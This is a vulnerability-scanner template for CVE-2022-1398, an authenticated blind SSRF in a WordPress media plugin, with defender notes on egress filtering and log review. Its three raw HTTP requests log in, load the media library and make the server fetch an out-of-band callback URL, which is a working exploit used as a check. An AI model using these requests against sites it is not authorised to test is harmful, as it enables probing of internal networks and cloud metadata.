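# Detection template for CVE-2022-1398: authenticated blind SSRF in the
# "External Media without Import" WordPress plugin (versions through 1.1.2).
#
# Inputs: {{username}} / {{password}} must be valid credentials for the target
# site; per the description, a subscriber-level account is sufficient.
#
# NOTE(review): the check is behavioural, not a version comparison. It submits
# a URL through the plugin's add-media action, so a vulnerable site may be left
# with an extra media-library entry after a scan; verify and clean up.
id: CVE-2022-1398

info:
  name: External Media without Import <= 1.1.2 - Authenticated Blind SSRF
  author: theamanrawat
  severity: medium
  description: |
    The External Media without Import WordPress plugin through 1.1.2 does not have any authorization and does not ensure that media added via URLs are external media, which could allow any authenticated users (including subscriber) to perform blind SSRF attacks.
  reference:
    - https://wpscan.com/vulnerability/5440d177-e995-403e-b2c9-42ceda14579e
    - https://wordpress.org/plugins/external-media-without-import/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1398
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-1398
    # CWE-918 is Server-Side Request Forgery. The listing carried CWE-981,
    # which looks like a digit transposition; confirm against the NVD entry.
    cwe-id: CWE-918
  metadata:
    verified: "true"
  tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated

requests:
  - raw:
      # Request 1: log in so that the following requests carry a session cookie.
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      # Request 2: load the media library; its body is checked by the second
      # matcher (body_2) for the plugin's slug.
      - |
        GET /wp-admin/upload.php HTTP/1.1
        Host: {{Hostname}}

      # Request 3: submit an out-of-band callback URL to the plugin's
      # add-media action. The SSRF is blind, so the result is observed through
      # the callback rather than in the HTTP response.
      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        urls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import

    # Reuse the cookies set by the login response in requests 2 and 3.
    cookie-reuse: true
    # Both matchers must hit before a finding is reported.
    matchers-condition: and
    matchers:
      # Require an HTTP interaction at the callback host. A DNS-only
      # interaction is deliberately not enough: it can come from a resolver or
      # a security proxy without the server ever issuing the HTTP request.
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      # Require the plugin slug in the media-library page (response 2), which
      # ties the callback to a session where the plugin is present.
      - type: word
        part: body_2
        words:
          - "external-media-without-import"

# Defender notes:
# - A hit means the web server made an outbound HTTP request to a URL chosen
#   by a low-privileged user. Where the application does not need it, egress
#   filtering from the WordPress host to internal ranges and cloud metadata
#   endpoints limits the impact.
# - This template names no fixed plugin version. Check the WPScan advisory
#   under info.reference, and deactivate or remove the plugin if no patched
#   release is available.
# - Log review: POST requests to /wp-admin/admin-post.php with
#   action=add_external_media_without_import from non-administrator sessions.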